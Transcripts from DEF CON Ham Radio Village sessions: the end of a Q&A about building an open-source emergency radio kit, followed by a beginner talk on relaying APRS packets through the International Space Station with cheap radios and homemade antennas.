presentation here for a while And I hope to have a complete a bill of materials done but the case itself is an Apache Harbor Freight case They're very affordable they're they're very similar to Pelican cases they come with a foam block you can pick apart inside for cushioning parts I took the foam out so that I've 
had greater airflow through the kit And I guess here as in as a Defcon exclusive I usually don't show off the inside of my kits especially when they're under construction But if there's interest I'd like to show off kind of what's inside the kit Normally I would have thumb screws on the side that I would undo but I haven't gotten around to those yet I'll remove the Snacks S panel and the wires are still kind of a mess I've got a battery lithium iron phosphate battery that I just put in the kit last week I have a USB hub that comes out of a Raspberry Pi underneath and I need a better solution maybe some kind of little shelf to build in here to separate everything out so there's better airflow And then the radio here is in the back I have an RTL-SDR software radio that goes into the Raspberry Pi And of course I have the Snacks off to the side and a fuse block that the 12 volts come off of Cool we got a question about maybe using magnets to hold down the panel on the keyboard like the Rayworth magnets, that's something you've looked at Yeah that would not be a bad idea at all The keyboard has a weird kind of curve to the back so I would have put like a Velcro or something maybe on there that would snap down But magnets would be a good idea too I just need a way to either epoxy or anchor the magnet to the keyboard or maybe to the box and then maybe put a plate on the back of the keyboard See these are all great ideas that you could post to the Torx station discord or the forums if we ever get them up and running Absolutely, absolutely. A question here on the chat about have you considered using solar for power and maybe there might be some interference with that Oh, so that was another thing that was brought up in our discord chat a few days ago was someone who had a question about solar controllers and noises and if anyone had experience with expensive versus cheap ones I actually have a solar panel on the way it's going to be here tomorrow Someone posted a bargain online for one of them and I snatched up a nice folding one But yeah so I had a couple batteries in my version one of the kit so that I'd have a lot of power and in this version two you saw the one lithium iron phosphate battery in the back That was about 1500 amp hours and I labeled a switch with 14 amp hours so that or 1500 milliamp hours excuse me and then I have the switch labeled 14 amp hours so that I have a little cushion left over I'd love a 15,000 amp hour battery Yeah, that would be great So I have a question here about you mentioned no selling for benches but what about individual parts I would like to have in the bill of materials links to parts that people use or when I built my computer a few years ago the PC part picker website would continually scan other websites would scour for prices and tell you who had the lower price and if there were any sales going on Ideally there would be some kind of functionality that's like very very very far down the road but for parts ideally like I would just put my Amazon links for where I got all the parts basically all the parts of the kit What kind of kicked off the kit plan design was this red kill switch that I installed I've always loved these growing up and being able to buy them by a five pack was incredible like I love being able to buy stuff like that online these power connectors are 3D printed those were made by I found them on Thingiverse Yeah, most of the stuff was I was able to source online which I wouldn't have been able to do about 10 years ago. 
So being able to source stuff online is a great, great benefit to the ham radio hobby. Great question from tWitch. What are the temps inside the case when everything is powered on and running. It depends. I haven't used a heavy duty cycle. I can't imagine it's very warm with just the Raspberry Pi running. If I was broadcasting a lot with the radio, the temps might get pretty warm. I thought about putting active cooling in. I've got empty space up here above the display panel if I wanted to put a couple case fans up here just to move air through. I could move some of the air slots around. So this is basically the prototype version of this panel. It's made out of MDF wood that I spray painted black. I hope to source a plastic panel from the local plastic store. They make a nice textured plastic, a black textured plastic that I think will look really sharp but it's going to be more expensive than the MDF. I want to make sure that the layout is done before I get the final panel cut. Great. That sounds pretty awesome. We've got a question here about when it comes to selecting components, what part do you suggest that people don't skimp out on when it comes to parts and what parts you think people can maybe buy the cheaper version of? That is a very good question and that's actually part of the reason I kicked off the Ostwork initiative was to help answer that question for me so that I'd be able to select parts for my kits. I know a lot of people out there have bought parts and they know what works and what doesn't. This is a learning experience for me, but it's kind of an expensive one. So I before I pull the trigger on an expensive solar charge controller or which I imagine if you want low noise like on the HF bands, you probably want. You probably don't want to skimp on your charging controller. I've noticed a little bit of noise running the pie. I don't know if I'm going to be able to shield that if I be able to build a little shielded shelf maybe around the pie where airflow could go but RF noise can't. So there's lots of ideas for improving the kit and they can always be improved, but I don't have any suggestions right off the bat. But I would imagine probably your charging controller, especially if you use expensive batteries or and that's another thing you want to consider when picking parts is make sure your charging chemistries are compatible. When I made the first version of this kit, I used lead acid batteries, and then they were super heavy but I had to upgrade to well I didn't have to upgrade but I wanted to upgrade to lithium iron phosphate batteries which are lighter a lot more expensive. But they also use a different charging chemistry I can't use the lead acid charging system that I had in the old kit in this new kit. So I had to budget for a new charging system for the kit that was compatible with the lithium iron phosphate batteries. Great. Yeah, there's a couple comments here in Twitch. One person talks about, you know, if you don't want to take a charge controller taking a lot of space, maybe have a different a torque station that's a like a power module, you know, power type torque station does all that just in its own separate box. Yeah, that was an idea like one of the power torque stations like I want to have a power interface kit. So people would be able to tap into different powers or different like electric vehicles or solar wind water like a kit that would be able to convert a variety of voltages down to the kit voltage. 
And so, yeah, that's something for people to consider whether they want to whether they want to build it into their kit or whether they want to carry an external kit that would that would house that functionality, but the kits would hopefully be functional or be compatible not only with each other, but with other torque stations as well. Yeah, I've also started to see a rise in popularity of the they call you know battery generators quote unquote or just basically a battery box with a bunch of power distribution that you know, buy off the shelf which is kind of nice for like I just need power and I need lithium power and off grid. We're going to question. Yeah, go ahead. Oh no, it's gonna say yeah those are great. Yeah, I have not not splurge on one yet but hopefully soon. Question here could you talk a bit more about the antennas and or connectors used for the antennas the hook up to this kit. Yeah, I use just the standard UHF antenna connector. I've got actually probably easier if I just took off my nano DNA here. So this is a nano vna I have kind of Velcroed to the kit. It's used as an antenna analyzer, and I use this type of connector. Do I'm going to embarrass myself here PL 259 or SO 238 or 239 I mean, but it's just this standard type of antenna connector, and then I have a few I have a box around here with different adapter connectors for the antenna, but the antenna that I have to use right now is I got from my brother a BW AP 10 a I don't have the whip on it right now there's a whip that extends off the top that I can raise and lower, and then it also has a tunable loading coil that I can adjust for the frequencies to get a better reception or better broadcast on those frequencies. But that just has a the same type of screw that screws on to the screws on to the the the kit there the bulkhead connector. Very nice. Yeah, you can always just say UHF connector in your good. Yeah, specific. I think that's an SO I think it's SO is socket PL is Polog I think is what it is. Oh, okay. So I think that's all we have for questions right now in the chat. Is there anything else you guys want to show or talk about. Um, I'm just curious if anyone had just thought of any like if this is inspired anyone to make their own kit or if anyone has any ideas actually here's an idea so for in person, the ham radio village. What if we could maybe start a fundraiser to make a three or four torque stations for a get on the air station. And then at the end to give them out to school groups. And then they can just be a fundraiser kind of thing to make the stations and then and then after they're used for people to get on the air. They can just be a donated out like would that be something people are interested in. Yes, I'm going to have to take the pulse on you know just also just completely off the cuff pop my head and you could have a, you know, potentially even prior to Defcon said okay well build your best you know torque station and come you know during the competition. That could be part of the torque Cathalon maybe if we if that if that ever takes off. I mean it's not Defcon if there's no slaughtering errands involved. Maybe a build one within like an hour to competition or something maybe. Cool. Well thank you for putting this presentation together and hanging out and chatting with us. I thought this was a panel. Yeah, even get a comment in the chat someone says he's very inspiring so it's great to hear. Thank you for coming. 
I thank you all for joining me and thank you to the staff for putting this on.
|
OSTWERK stands for Open Source Tactical Wireless Emergency Radio Kit, an all-in-one customizable solution for building ham radio kits. This will be a 30 minute talk and Q&A about the initiative, my sample kit, and what I hope to accomplish (website features, sponsorships for kits for schools, etc.). Feel free to ask any questions after the presentation, or at my information table in the Ham Radio Village discord server!
|
10.5446/51649 (DOI)
|
This is also going to be a one-cut take like a normal Def Con presentation would be. So there's going to be a lot of flugs, a lot of hems, a lot of haws. That's about it. I know it's without further ado, let's get going. Can't even transition a slide, alright. So a little bit about me in my background. I started off my professional life as a civil engineer. I went to college, got my bachelor's degree, master's degree in civil engineering, became a professional engineer and realized it really wasn't for me. I didn't really like it as much as I thought it was going to. I then got an opportunity to start a security analyst position at Barrick Food and Networks. We started coming to Def Con, Def Con 22. So I've been here for what, six years now, seven years now. And I love doing anything wireless. I love wireless security. So I started playing in the wireless CTF and we won three years in a row, I believe. And now I'm a village member, so now I get to help make the challenges. And yeah, it's one of those things that the reason I started off with this is because I forever feel like a noob. I forever feel like the imposter syndrome is a real thing. And this talk is more of a, I'm not an expert in this, but it's something that I find really interesting and it definitely encapsulates that hacker mentality. So if this is your first Def Con, you're going virtual, you're watching this talk, don't hesitate to get your feet wet to reach out to people because at the end of the day, I feel like everybody feels like a noob. And if they don't, then they definitely are a noob. So without that, I basically just wanted to give my background that I didn't have a, you know, computer science degree. I didn't have a formal background in computer security or really anything at all except for civil engineering. So don't, don't hesitate to get yourself out there. So this talk, talking to satellites, why? Personally, I think it's cool. The International Space Station is specifically what we're going to be going to cover. So there's a lot of satellites that are floating up above us or orbiting above us that are capable of, you know, ham radio communication or just communication from the ground just by normal citizens that don't require, you know, any special permission other than ham radio license to transmit to. Well, it's cool about the International Space Station. I mean, it's orbiting 200 miles above us, which actually when I, when I first started doing this, 200 miles didn't seem like a lot to me. It seemed like that, that it should be orbiting higher than that. But soon a mile's up, it's going roughly 17,000 miles an hour. And that's 10 times faster than a bullet. Just kind of put it in like rough perspective. And it is going, it's orbiting so quickly that it can go around the entire planet in about 90 minutes, which I think is incredible. And it's also the most expensive object ever built, which is kind of neat that just being a normal civilian, I can talk to the International Space Station and even to astronauts on the International Space Station with just, you know, general equipment and just a ham radio license. And even if you don't have a ham radio license, you can still listen to transmissions from the International Space Station, which is also, I think, pretty cool. So here's a quick overview. 
Basically, we're, have a talk to ISS on the Chief, the how's and the why's of, you know, why you'd want to do it and how you do it, the gear that you're going to need, the software that you'll need, the rough skills that you might need to have or, you know, brush up on. And timing when you're going to talk to the International Space Station because it's orbiting every 90 minutes and there's only very narrow windows that you can actually, you know, try and communicate with it on. And then basically just now that you have all this power, how not to be a jerk. I feel like hacker mentality is the, you know, like, oh my gosh, we're going to do all these bad terrible things. But at the end of the day, you know, should you, this is, this is something that's pretty cool. And you want to give others the opportunity to do it as well. See, moving on. So the how's and why's. So there's AR ISS, which is amateur radio on the International Space Station. Basically this is up there for educational purposes. It's community driven. It's one of these things that kind of inspire the, you know, the heart of people of, hey, what are we going to do with space? Why is space important? So I think it's kind of cool that they have a couple, you know, amateur radio stations on board in it or not stations, but I guess transceivers on the International Space Station that are that are meant for amateur radio operators to interact with. So what we're going to be talking about is the two meter packet radio that's unattended on the International Space Station. There are definitely some attempts that you can have where crew members might be staffing the International Space Station and actually on the ham radio that you can talk to via voice. However, to try and get that to work is, is, you know, it's a far more limited and you have to plan far more, you know, up in advance. Whereas the unattended packet radio basically is going to act as like a repeater for you and it's always up and always operational. And it's just one of those things that it's far easier to get a communication, you know, repeated from the International Space Station because it's done automatically. And there's a bunch of other operating modes that the International Space Station has. And you know, you can go online at any point in time and check that. But really what we're going to be focusing on is the two meter packet radio. And so I also had no idea that, you know, a lot of ISS crew members are also ham radio operators, which I thought was kind of cool. Yeah, so we'll just, you know, break down the basics of it to transmit and talk to the International Space Station. You're going to need a ham license. And that's just to transmit. And that's really because you're going to be operating on frequencies and with hardware that could, you know, cause issues for other people. So it's not just like a cell phone where, you know, your phone is going to take responsibility for talking back and forth to a cell tower. This is something that, you know, you're going to have transmit power and you want to be judicious with how you use it. However, that being said, if there's something that's interesting to you, you can listen without a ham license, no problem at all. You know, you don't need anything just to listen. It's really just transmitting because that could affect other people. And if you want your ham radio license, the ham radio village is offering I believe $5 exams, which is, I mean, pretty cheap. 
Normally it's, I think $20, but everything's going to be virtual, obviously, because it's DEF CON. And for $5 to, you know, make an attempt at your technician license, it's one of those things I think you have to renew it every 10 years. I definitely recommend checking it out. You know, it's definitely a great opportunity. All right. So there's a lot of things that I never quite understood when I was getting into all of this. And again, by no means an expert. So there's probably a ton of, you know, things in these slides that a seasoned, you know, extra ham operator is going to know that I'm going to completely flub up on. But I basically just, this is something that, you know, whenever I looked at this, I would always kind of say, oh my gosh, I don't even know what all of this garbage means. So when people always said two meter band, I had no idea what the heck is a two meter band, you know, FM, 1200 BPS packet radio, all that stuff just sounded like gibberish to me initially. And I really wish that somebody would have explained it to me in layman's terms, you know, just so I could at least get the basics and then kind of dig down from there, at least, at least kind of get my feet wet. So if you look at that small little equation on the right hand side of your screen, you're going to see it's C equals, I think that's lambda and then whatever the new, I don't even know the Greek symbols, right? But at the end of the day, what happens is C is the speed of light. So if you divide that by your frequency, which is a megahertz, a megahertz is a million hertz, so a million cycles per second. So you can think of Wi-Fi as 2.4 gigahertz, you know, or 5.8 gigahertz, just kind of put that in perspective. So if you divide the speed of light by the megahertz of the frequency you're transmitting on, you divide those two and you get two meters. That's kind of how the math works out. And so when people say, oh, it's on the two meter band, well, that's the same thing as saying it's about 144 megahertz-ish. I think the two meter band's anywhere from 144 to 148 megahertz. But that's what people are talking about. So 70 centimeters, you can do the same math and figure out that it's about 460 megahertz, I think, off the top of my head. And that's also considered VHF. So you'll hear VHF, two meter, and 144 megahertz. Those are all kind of in the same ballpark. And that's just one of those things to hear those terms thrown around a lot. And I had no idea what they meant. So I figured it would be helpful to kind of throw out a slide and explain that briefly when somebody says I'm operating on the two meter band. Oh, OK, that means 144 megahertz-ish. You know, and that's also considered VHF, very high frequency. So the next part of that, what is FM? You know, you probably have heard of AM-FM radio in your car. AM is amplitude modulation. So you can see the little graphic on the bottom right of the screen. That's where the wave is actually modulated up and down. So you can kind of think of this waves and a pond. You know, if you throw a rock in and there's big splash, those waves are going to be bigger and that's going to be amplitude. You know, there's a, the varying amplitude there. Whereas FM is how close those waves are, you know, in a ring and a circle. Sorry, I'm using my hands a lot. I don't know, probably look like magician. But basically you're stretching like a slinky, you know, FM waves. You're modulating the frequency how fast it goes. So you know, there's AM-FM. So we're looking at two meter band FM. 
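To sanity-check that formula, here it is in Python: divide the speed of light by the frequency in hertz and you get the wavelength, which is why the 144 MHz region gets called the two meter band. The 70 centimeter example frequency is just a representative value from that band, and 145.825 MHz is the frequency commonly listed for the ISS packet system.

    C = 299_792_458.0  # speed of light, meters per second

    def wavelength_m(freq_mhz):
        return C / (freq_mhz * 1e6)

    print(round(wavelength_m(144.390), 2))  # ~2.08 m -> the "2 meter" band (US APRS frequency)
    print(round(wavelength_m(145.825), 2))  # ~2.06 m -> the ISS packet frequency
    print(round(wavelength_m(446.000), 2))  # ~0.67 m -> roughly the "70 centimeter" band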
So it's frequency modulated. And this is typically not something that you're going to have to worry about. It's lower level stuff that the radio is going to take care of. But it's just good to know because I didn't know it when I started out. Gosh, 1200 BPS. So it's a bod not bits. If you mess this up, you know, the internet's going to murder you because you're, you know, technically wrong. I always thought that bod and bits were exactly the same. It wasn't until I dug into it that I actually realized, oh gosh, they're, you know, they can be different. So you can think of a bod as like a signal interval or like a pulse. And in the early days, I guess, I don't know, I wasn't around during the early days, but early modems would do one bit per bod. So basically just be one bod and one bit were the same. So 1200 bits and 1200 bod were the same exact thing. However, now there's craftiness in there that allows you to transmit at a higher bit rate with the same level of bod rate. So if you can transmit eight bits in a single bod pulse, that should come out to 9600 bits per second, even though your bod rate is only 1200. I don't really know. Again, it's one of these things that that's just what APRS or the packet radio service uses. The software takes care of it all for you. You don't have to worry about it, but it is helpful to know so that the internet doesn't murder you. And then the technique that that is used for like, you know, packing things, you're packing eight bits per single bod is called quadrature amplitude modulation. Say that at a party and no one will want to talk to you. So it's one of those things, again, super nerdy stuff, but it kind of helps to know. For me, you can look at that and at least kind of digest it and understand maybe not why it's that way, but at least that those would are that's what all of these things mean when somebody says, oh, two meter band FM at 1200 bod, you kind of know what's going on there. And then packet radio, you know, I guess to me this wasn't any news, but it's it's packetized data, right? And that's that's one of those things where instead of it just being a continuous flood of data, all the data comes in packets. And especially for, you know, for APRS, it uses the AX 25, which includes your call sign and I believe for FCC requirements, you need to transmit your call sign anytime that you're going to transmit, you know, power out into the, you know, to the atmosphere. And so this basically satisfies that. But yeah, data comes in in packets. And what happens is say you have like a small walkie talkie or not walkie talkie, but a small handheld radio, if you were to transmit on that small radio, what's going to happen there is it is going to get sent out, you know, and not a very far distance. And so the goal of the packet radio service, or I think it's packet radio packet reporting system, I can read my slides, is basically to to repeat that information out farther. So your handheld, you know, radio is going to only make a certain distance, hopefully gets far enough away that, you know, that it can reach a larger repeater that's then going to take your message and repeat it. And the way that APRS works, I think I have this in my next slide, maybe not, but the way that essentially works is you can select how far out you want that message to be repeated. 
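The baud-versus-bits point boils down to one multiplication: bit rate equals symbols per second times bits per symbol. The classic 1200 bit/s packet mode carries one bit per symbol, and the second calculation simply reproduces the eight-bits-per-symbol arithmetic from the talk rather than describing a mode actually used on APRS.

    import math

    baud = 1200                      # symbols (signal intervals) per second on the air
    bits_per_symbol = 1              # 1200 bit/s AFSK packet sends one bit per symbol
    print(baud * bits_per_symbol)    # 1200 bit/s

    # If a modem packed 8 bits into every symbol (for example a 256-point constellation),
    # the same 1200 baud would carry:
    print(baud * int(math.log2(256)))  # 9600 bit/s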
So if you're say, you know, out in the sticks and there's not a whole lot of, you know, there's not a whole lot of repeaters out there, you might want to set a wider setting or, you know, like a time to live if you're familiar with, you know, Internet lingo. That basically says, hey, you know, repeat this out this many hops. And the whole goal of this is essentially to reach what's called an eye gate. And an eye gate will take your packet radio, your take take your transmission and put it on the public internet. So that way, you know, anybody in the world then can now look at it or, you know, any other if you have a program written or something like that, you can digest that information and see where it's coming from, from anywhere in the world. So APRS was created by somebody. His name is Bob Roode. I don't know how to say his last name. Bob created it, I believe in 1973 ish. And if you look at this, this image of the world, every, every continent ish or every, you know, region of the world has a different, slightly different frequency that it transmits APRS on. And those are all in megahertz. So you can see anywhere in the United States, if you're, you know, which is where I am at least, it's going to be transmitted on 144.390 megahertz is the frequency that everything is going to share. The kind of bomber part about that is that because we're all using, you know, and say we ham operator, ham operators, if we're all transmitting 144.390 megahertz, well, your transmission will interrupt somebody else's transmission. So there's a lot of room for collision, especially when you figure that every time you transmit a message, what's going to happen is that's going to be repeated by any number of other larger repeaters. So there's a lot of, you know, potential congestion in there. So it's one of the things that you don't always want to transmit your message as far as it will possibly go. You just want to get it as far as you need to go to kind of be respectful of the space. And again, I'm breaking all this down because you'll see why it's important when it comes to the ISS later on. So automatic packet reporting system, that's what APR stands for. A lot of times what people will do is ham operators will have, you know, a little tracking device, beacon devices that have a GPS unit on there, and they will beacon out, you know, a location at a set interval, you know, it could be 10 minutes, it could be one minute, whatever their specified interval is, and they will beacon from the small transmitter to, you know, larger repeaters with the intent of getting online. And this is useful if, you know, you're somewhere where there's not cell coverage or, you know, this was invented before cell phones ever existed, like, I guess, like as ubiquitous as they are now. And so it was a great way to track things. You know, it's a great way to track, you know, you can put them in your car or put them in a boat, put them in a plane, you know, people have used them for hot air balloons, you know, and just all sorts of things where maybe cell coverage isn't going to fit. This is a great way to track assets really. So you can see from this little image, you know, this is kind of like the traditional what people think of when they hear APRS or, you know, packet radio. They think of a radio that actually transmits the signal. 
They think of, there's a little device, I think it's called a terminal node controller, yeah, TNC, which basically takes your GPS data and any message data and any other additional data, and it basically makes that into an audio format, you know, it encodes into an audio format that then is transmitted out by your radio. So that's kind of the traditional way that this looks. However, things have changed now since everybody has cell phones. So you can do a couple of things here. So instead of having, you know, a device that has to have onboard GPS and you already have to have an additional piece of GPS information and additional computer and additional encoder and all this different stuff. Instead of what you're going to have here is you can have a Raspberry Pi that does it, or you could just have a phone that, you know, automatically has GPS on board, automatically has the audio cable on board. And basically you hook up an audio cable or a sound card if you're using a Raspberry Pi to a radio, a Chosebaut thing, people love and hate these types of radios, but I like mine personally. And basically what you do is you use then these devices to encode your message, you know, as an audio file that is then transmitted out your radio. And the whole purpose of that is essentially, you know, you could take what used to be a giant apparatus that would fill, you know, like an entire desk and out something that can easily go in your pocket and the batteries last for a pretty decent amount of time. And so that's kind of how this, how like, like the hardware wise, at least what you need or what that looks like. The next part, at least when I was starting out looking at this, I thought that, man, I must need a ton of power in order to transmit to the International Space Station. Like it must just be crazy amounts of power. I'm probably going to dim the lights in my house trying to get the signal that far away. But really, it's incredibly low. I've heard that people have done it on as low as a single watt, but five watts that comes on your standard Baufang radio is more than enough to transmit to International Space Station. And really, when you think about it, that's less power than what your, you know, your phone charger puts out, which I thought was pretty interesting that you could transmit up to something orbiting up in upper atmosphere or, you know, low earth orbit for just five watts just seems kind of crazy that, that there, you know, that I can't get that far, I guess. So this kind of is a better way to, to show what I was trying to explain is that there's a little tracker you can see that I think that I've, I've figured with the name of that tracker is, but basically it's super small tracker. I think it's about $100 that, you know, will, will beacon out, I believe one watt at a pre-described interval with GPS and everything on board. And the whole goal of it is that, that little transmitter may not be able to get very far. But the whole point of it is that you're trying to reach a single DigiPeter and these DigiPeters set up by their ham radio operators. And if there's not one in your area, you know, it's one of those things that would be kind of cool to set one up just to, you know, spread the net of APRS far and wide. But essentially the whole goal is for that little tracking device or, you know, any other, any other end node that you may be having your pocket or whatever to transmit to a higher power DigiPeter, you know, repeater that digitally repeats it. 
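Putting those pieces together, an APRS transmission is essentially a text line: your callsign, a destination, the digipeater path that controls how far it gets repeated, and a payload such as a position. Here is a rough sketch of building that text; the callsign and coordinates are placeholders, and a real tracker or TNC wraps this in an AX.25 frame and turns it into audio for the radio. The ARISS alias in the second example is the path generally recommended for working the ISS digipeater.

    def aprs_position_frame(source, lat, lon, comment, path=('WIDE1-1', 'WIDE2-1')):
        """Build the human-readable form of an APRS position packet."""
        def to_aprs(value, pos_hemi, neg_hemi, deg_width):
            hemi = pos_hemi if value >= 0 else neg_hemi
            value = abs(value)
            degrees = int(value)
            minutes = (value - degrees) * 60
            return f'{degrees:0{deg_width}d}{minutes:05.2f}{hemi}'

        payload = f'={to_aprs(lat, "N", "S", 2)}/{to_aprs(lon, "E", "W", 3)}-{comment}'
        return f'{source}>APRS,{",".join(path)}:{payload}'

    # Terrestrial two-hop path, then the single ARISS alias used when working the ISS
    print(aprs_position_frame('N0CALL-7', 40.7608, -111.8910, 'hello from the ground'))
    print(aprs_position_frame('N0CALL-7', 40.7608, -111.8910, 'via the ISS', path=('ARISS',)))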
The express purpose is really to get it to a larger gateway, in this case an iGate, and the iGate can then connect it to the internet. The nice part is that once it's on the internet, there are websites like aprs.fi which aggregate all of this data globally. You can look around and see all the devices transmitting out and about in the world; you can look at the other side of the planet and just see everything out there. There are weather stations, hot air balloons, a lot of cars, boats, planes, you name it. A lot of devices are tracked on APRS, and it's kind of neat to see where they all are. So that was a big explanation of APRS. What matters here is that the ISS has one of these digipeaters on board, which is pretty neat, because normally you would try to reach a digipeater sitting on a nearby mountaintop. But if you can transmit to the International Space Station and have it digipeat your message, you can now be received over a huge, far and wide area down below, because the ISS has a great vantage point on the rest of the planet. I think I've gotten up to 800 or 1,000 miles for how far away I've heard somebody else transmit from. Normally, to send a message that far on VHF, the two meter band, you would need a decent amount of power, a great vantage point, and everything would need to go just right. With the International Space Station, because of its vantage point in space and its clear line of sight down to the earth, you can get your message really far. I just think it's really cool that the most expensive object that's ever been built is something we, as amateurs, are able to relay a message off of. Yeah, so this is a website: if you go to ariss.net, it looks like what a website would look like if I made it. The graphics aren't crazy, but it's really cool in that it aggregates all of the stations that have heard the ISS or transmitted through the International Space Station. So you don't need any hardware at all: if you have a phone, you can pull up ariss.net and just see what stations around you have heard the International Space Station, where it is, and what messages are coming off of it. Because a takeaway of APRS is that if all that information gets aggregated online, you can see it from anywhere in the world, which I think, again, is kind of neat. So let's talk about the hardware. I have made the horrific mistake in the past of posting links to hardware on my slides, and then I find a better price somewhere, or the item isn't there anymore. So what I'm going to try to do this time is keep an up-to-date list at github.com; you can see the link right there.
And the whole purpose of that is so I can update the list and find better prices, because things change and there are better spots to potentially get some of this stuff. So this is kind of my go-to hardware, and if you look at it, it's pretty darn cheap: $35, $20, $10, $8. You're looking at under $100 to be able to transmit a signal, over amateur radio, to the International Space Station, which, for that price and skill requirement, just being an amateur and a civilian, I think is pretty cool. This is a cheap Chinese radio. I personally really like them; I know a lot of people on the internet hate them, but it works well for me. For $35 it's a great way to figure out, without breaking the bank, whether ham radio in general is going to be a good hobby for you. It has a lot of other capabilities: you can listen to normal FM radio, it can be a police scanner, there's just a lot of other stuff it can do. For $35 on Amazon you can't really beat it. So, it comes with a little stick antenna, like what you would see on a walkie-talkie; that's what the Baofeng radio ships with. But you can build a directional antenna, which is what you're going to want if you're going to talk to satellites or the International Space Station, because a traditional stick antenna radiates its signal out kind of like a donut: if you hold it so the antenna is sticking straight up, it radiates out like a donut around it, and I should probably have a slide in there with the radiation patterns. What you really want is a directional antenna that focuses that energy more like a flashlight into the general spot in the sky where you're trying to aim it. For $10 or $20 you can build your own antenna, which I think is even cooler. Then you need an audio cable, or a sound card if you're going to use a Raspberry Pi; or you can skip the Raspberry Pi entirely and just use your cell phone, since most people have one, with just an audio cord for it. Under $100, and you can transmit to the International Space Station, no problem. Again, I'm going to try to keep that list updated; if something's missing, shoot me a message and I can update it or see if there's anything better out there. And for the amount of money, what you get out of it is huge, especially because I'm sure a lot of you have kids home from school, or maybe you're a kid learning remotely now. What an awesome project for under $100 to learn about physics, space, orbits, math, all these things that are super nerdy (because I'm a super nerd), but there are a lot of applicable lessons to other stuff as well. The other thing you're going to want to do is turn on VOX. Again, this is one of those things I'm probably going to get internet hate mail for. VOX is voice-operated switch: when you start talking, the radio detects that you're already talking and starts transmitting right away.
That's nice because it means that if you plug in an audio cable from your phone or a Raspberry Pi, the second it starts playing audio over that jack, the radio starts transmitting. Why this isn't ideal is that there's always a little bit of transmit time after you're done talking where the radio is still keyed, and that can mess up some communications. So it's not ideal; you really want push-to-talk. But if you're just getting started, it doesn't hurt to use VOX just to get your feet wet. That's my personal opinion; I'm sure I'll get hate mail, but whatever. So, I own an Arrow directional antenna, very similar to the one in that image right there. It's like $150, which is more than the entire cost of the rest of the project, and if ham radio is something you're not sure you're going to stick with, you're not going to want to buy some giant antenna. I have one because it's something I really enjoy, but $150 is pretty steep. Or you could build your own. This is one of those things I stumbled on while checking stuff out online: somebody had built their own directional Yagi antenna for about $10 out of PVC parts and a measuring tape, which is perfect because I build everything with Raspberry Pis and PVC anyway, so I had a lot of that lying around. And a measuring tape, funnily enough, I didn't even think about it, but measuring tapes are steel, so as long as you sand off the tips of the elements to solder your cables to, you can make an antenna out of a steel measuring tape, and it folds up nicely too, which is an added benefit. I'll have a link to this on that GitHub page I mentioned, but if you want to Google it right now while you're watching, just search for Leggio (I don't know exactly how you say it, but that's how I say it) and then Yagi, and all the instructions, the build list, everything is there. I'm not going to go over all the details or show a time lapse of me building mine, because it's not really necessary; plenty of other people have done a lot of work to make that pretty nice. I personally think building your own antenna is a nerd merit badge. If you're a student and this is interesting to you, it gives you a little more stake in it: not just "I bought all this stuff off the internet, put it together, and now I can talk to the International Space Station," but a little bit of that hacker spirit, that hacker mentality, of "I built this antenna out of raw parts and cobbled it together to get it to work." To me that's kind of neat, to have this project where, yeah, this is something I built with my hands, and I'm talking to arguably the most expensive object humanity has ever built. It's just cool to me that you can talk to the International Space Station with PVC, a measuring tape, and a radio you bought off Amazon. And it takes about an hour to build.
If you have kids and you want to all get them interested in space and engineering and STEM stuff, you know, or just to get their hands dirty, I think this is personally a really cool project and it's not going to break the bank to try it. And let's see, I don't know why I can't change sides. So there it goes. So this is my antenna up on top of my patio. It's all on top of my patio, obviously, so I can get a better line of sight. And I keep everything in my little ammo box and I use a tripod. But again, you can just hold your hand out there with an extra piece of PVC and it works just as well. It's one of those things that it looks, it looks homemade and that's what it is, but you're talking to a satellite with a homemade antenna. I think that's pretty cool. So obviously, if you build your own antenna, you're going to have to tune it a little bit. Luckily if you follow the instructions online of the, you know, of the antenna that at least I made when I went to tune it and from what I've heard from others when they go to tune it, everything is pretty spot on it if you measure things carefully. But the way that you tune your antenna is by looking at the standing wave ratio or SWR. And this really just measures the performance. I like to think of it as say you have a, a like a tube of like, you know, gift wrap, right? And you shout down that tube, how much of your sound that's leaving your mouth going through the tube is actually making its way out the tube. And that's kind of how you can think of SWR working with your antenna of, hey, if I'm going to put five watts of power into my antenna, how much of that power is actually going to be coming out my antenna or how much of it's going to be wasted, you know, kind of just banging around the, you know, just kind of radiating off of it. So there's one of those things that, that, you know, if you know a ham radio operator, I'm sure they have, you know, a SWR meter. You can buy a cheap one online for $20. I don't have one of those. I don't know how well it works. I personally have a nano VNA. It was like 50 or something dollars online and does a bunch more stuff other than just looking at SWR, but it's really small. It has a battery. I personally really like it. But again, if you're trying to not break the bank, you know, maybe a $20 one online is worth it or you find a ham radio operator that you just say, Hey, can I plug this in real quick and test it? You know, there are plenty of older ham radio operators that would love nothing more than to talk radio and talk shop. And it's a great way to build the community, build a hobby because ham radio operating is an aging hobby. You know, just go go to any ham radio operator meeting, you know, in your city and your state and your wherever you're from. And it's definitely an older person's hobby, but I don't think it has to be that way at all. The next thing is, it's really just one of those things that if you follow the instructions, you can probably have a pretty good SWR. And again, you I think mine when I did it was 1.3 to one, which I think perfect SWR is one to one. To me, this is just magic. I don't really understand how it works. I just know that you want your numbers to be as close to one to one as possible. Again, if I'm wrong, shoot me a message and let me know and I'll update the slides. So next piece of this is the software. Again, I have lots of Raspberry Pi's lying around from a bunch of other projects. I personally like to use Raspberry Pi. I use the software called DireWolf. 
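Going back to those SWR numbers for a moment, here is a quick back-of-the-envelope sketch in Python (my own illustration, not something from the talk) that converts an SWR reading into the fraction of forward power reflected back instead of radiated, using the standard reflection-coefficient relation.

# Rough illustration with made-up sample SWR values: how much of your power
# actually leaves the antenna for a given standing wave ratio reading.
def reflected_fraction(swr: float) -> float:
    """Fraction of forward power reflected back for a given SWR."""
    gamma = (swr - 1) / (swr + 1)   # magnitude of the reflection coefficient
    return gamma ** 2

for swr in (1.0, 1.3, 2.0, 3.0):
    refl = reflected_fraction(swr)
    print(f"SWR {swr:.1f}:1 -> {refl * 100:4.1f}% reflected, "
          f"{(1 - refl) * 100:4.1f}% radiated")

An SWR of 1.3:1 only reflects about 1.7% of the power, which is why a homemade tape-measure Yagi that measures around there is a perfectly good match in practice.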
